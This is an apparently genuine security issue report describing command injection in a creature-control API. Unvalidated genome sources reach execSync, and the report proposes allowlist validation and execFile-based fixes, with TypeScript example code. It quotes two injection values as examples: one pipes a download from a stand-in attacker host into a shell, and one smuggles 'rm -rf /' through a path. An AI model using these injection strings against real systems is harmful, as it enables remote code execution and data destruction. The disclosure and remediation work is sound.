Summary

The POST /api/creatures endpoint accepts a genome parameter from the request body and passes it, without validation, into shell commands via execSync string interpolation. This is a command injection vulnerability.

Call chain

parseGenomeSource() constructs a GitHub URL from the genome name but the URL itself goes directly into a shell command. A genome source like:

https://github.com/x/y.git; curl https://attacker.com/exfil | sh #

would execute arbitrary commands on the host. The subdir path from a 3-part source (e.g. user/repo/path; rm -rf /) also flows into git sparse-checkout set ${subdir} unquoted.

Affected files

- src/shared/paths.ts — autoInstallGenome(): lines 99, 100, 109
- src/cli/genome.ts — genomeInstall(): lines 51, 52, 57 (same pattern, but CLI-only — lower severity)
- src/host/index.ts — POST /api/creatures: line 671 (no validation on genome)

Fix

Two options:

1. Validate before use: Reject any genome source that doesn't match a safe allowlist pattern (e.g. ^[a-z0-9][a-z0-9/_-]*$ for shorthand names, explicit URL validation for https:// sources).
2. Use execFile instead of execSync: Pass arguments as an array so the shell never interprets them. Already done for the validate command in #64 (security: prevent container escape via BIRTH.json validate command) — apply the same approach here.

Option 2 is cleaner. git accepts arguments as an array just fine.

Severity

Medium-High. Requires access to the creature control API, which currently has no authentication (see #12). If/when token auth lands (#16), the exploit surface shrinks to compromised tokens. Either way, this should be fixed — defense in depth.

Already fixed

- name parameter: validated with ^[a-z0-9][a-z0-9-]*$ regex — good.
- validate command in genome.json: fixed to use execFile in PR #64 (security: prevent container escape via BIRTH.json validate command).
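
The two fixes proposed in this issue combined, as an added example (not the project's own code): the allowlist gates shorthand sources, and git is run through execFileSync with argument arrays. The names parseGenomeStrict, buildGitArgs and installGenome, the two-segment minimum for shorthand, and the specific git flags are assumptions; https:// sources are not handled here.

```typescript
import { execFileSync } from "node:child_process";

// Shorthand allowlist pattern quoted in the issue text.
const SHORTHAND = /^[a-z0-9][a-z0-9/_-]*$/;

interface GenomeSource { url: string; subdir: string | null }

// Hypothetical strict parser: accepts "user/repo" or "user/repo/sub/dir"
// (assumed shorthand shapes) and throws on everything else.
function parseGenomeStrict(genome: unknown): GenomeSource {
  if (typeof genome !== "string" || !SHORTHAND.test(genome)) {
    throw new Error("invalid genome source");
  }
  const parts = genome.split("/");
  // The pattern alone still admits empty segments ("a//b") and segments with
  // a leading "-", which git would parse as an option even without a shell.
  if (parts.length < 2 || parts.some((p) => p === "" || p.startsWith("-"))) {
    throw new Error("invalid genome source");
  }
  const [user, repo, ...rest] = parts;
  return {
    url: `https://github.com/${user}/${repo}.git`,
    subdir: rest.length > 0 ? rest.join("/") : null,
  };
}

// One argv array per git invocation; no command string is ever assembled.
// "--" ends option parsing before the positional URL and directory.
function buildGitArgs(genome: unknown, dest: string): string[][] {
  const { url, subdir } = parseGenomeStrict(genome);
  if (subdir === null) {
    return [["clone", "--depth", "1", "--", url, dest]];
  }
  return [
    ["clone", "--depth", "1", "--sparse", "--", url, dest],
    ["-C", dest, "sparse-checkout", "set", subdir],
  ];
}

// execFileSync starts git directly, so shell metacharacters in an argument
// remain literal bytes of that one argument.
function installGenome(genome: unknown, dest: string): void {
  for (const args of buildGitArgs(genome, dest)) {
    execFileSync("git", args, { stdio: "inherit" });
  }
}
```

Validation runs before any process is spawned, so a rejected source never reaches git at all.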